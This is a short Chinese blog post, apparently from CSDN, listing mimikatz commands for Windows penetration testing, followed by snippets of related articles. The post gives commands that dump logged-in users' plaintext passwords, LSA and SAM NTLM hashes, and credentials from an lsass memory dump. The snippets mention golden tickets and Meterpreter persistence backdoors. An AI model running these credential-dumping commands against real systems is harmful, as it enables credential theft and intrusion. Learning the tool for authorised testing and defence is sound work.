mimikatz使用

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量6.8k 收藏 7
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mirror97black/article/details/79899199
版权

mimikatz使用时需要高权限,至少是administrator权限
mimikatz抓取密码的命令需要system权限,可以先进行提权

privilege::debug  //提升权限(从administrator提升到system)

抓取hash

sekurlsa::logonpasswords   //获取当前在线用户的明文密码(需要高权限运行)
lsadump::lsa /patch   //获取当前此计算机存在过用户的NTLMHASH

mimikatz的其他命令

lsadump::sam SYSTEM.hiv //导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份
通过内存文件获取口令
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
最低0.47元/天 解锁文章
mirror97black
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4232
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
Mimikatz使用(黄金票据的制作)
jzm__123的博客
12-18 619
在他的工作范围内,他可以获取当前windows 的密码哈希值或者sid 和等来合成黄金票据的所需材料,这使我们的电脑十分危险,如果让我们的电脑遭受了他的攻击那么我们的会遭受到信息泄露,或者被注入病毒等一系列问题。孤独没有什么反义词,但他的近义词是自由,人生成功的道路上充满了孤独,那么也同样告诉你,你离成功后的自由不远了。黄金票据,打个比方,在生活中有一种非常牛的卡,一般存在于富豪手中,有了他,那么你就可以无所不能。username hacker (冒充的用户)3测试用的用户名(虚构的,或者用来冒充的)
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 1620
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
mimikatz的基本使用
a3320315的博客
05-25 9741
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
使用mimikatz获取windows密码凭证
cuteyann的博客
05-17 1357
(如果出现以下报错:ERROR kuhl_m_privilege_simple;RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)下载地址:https://github.com/gentilkiwi/mimikatz/releases。1、开启mimikatz。工具:mimikatz
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6495
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
mimikatz实战域渗透抓取域控管理员密码
热门推荐
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
mimikatz.rar
07-08
mimikatz 是一款windows平台下的神器,它具备很多功能,我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码,当然他的其他功能也很强大。
mimikatz-master源码
07-22
mimikatz-master
mimikatz获取系统密码
03-28
获取系统级别密码
mimikatz最新版本
11-20
mimikatz最新版本 嗅探hash
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1925
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
轻量级调试器神器 - mimikatz (学习了,很强大的工具)
我的IT乐园
06-01 1万+
神器mimikatz使用详解 一.mimikatz简介   mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。   mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更
mimikatz使用方法
子曰小玖的博客
04-29 2240
Home gentilkiwi edited this pageon 8 Sep 2014·36 revisions mimikatzis a tool I've made to learn C and make somes experiments with Windows security. It's well known toextract plaintexts passwor...
Mimikatz 使用小技巧
大方子
10-05 2646
1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::debug"" &quo
kali_linux上volatility获取镜像信息时出现了一个问题
weixin_43460822的博客
11-14 1036
问题:kali上获取镜像信息时出现问题,具体问题如下图像所示 尝试同一镜像文件通过两种方式从物理机传到虚拟机:共享文件夹&复制粘贴 发现对于通过共享文件夹的方式传进虚拟机的镜像文件volatility可以正常分析镜像信息,但是通过复制粘贴的方式传入就会产生上面的问题 猜测:在复制粘贴的过程中镜像文件发生了一些改变导致不能被正常分析 解决方法:通过共享文件夹的方式传入镜像文件 共享文件夹的...
MSF中kiwi模块的使用
谢公子的博客
03-11 3952
kiwi模块的加载 使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。 提权到system权限 进程迁移 kiwi...
关于本地提权的学习笔记(二):注入进程和利用漏洞提权
Mi1k7ea
02-26 3684
本文为学习笔记,很多不足之处望各位指导一下~ 注入进程提权: 该方式在实现提权的同时给系统安放了后门,以便于进行隐蔽的监听。 下载pinjector.exe程序: https://www.tarasco.org/security/Process_Injector/ 然后将该程序放入system32目录中,在命令行中输入pinjector,提示有-l和-p两个参数,先输入pinje
kali 中mimikatz使用教程
06-28
这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值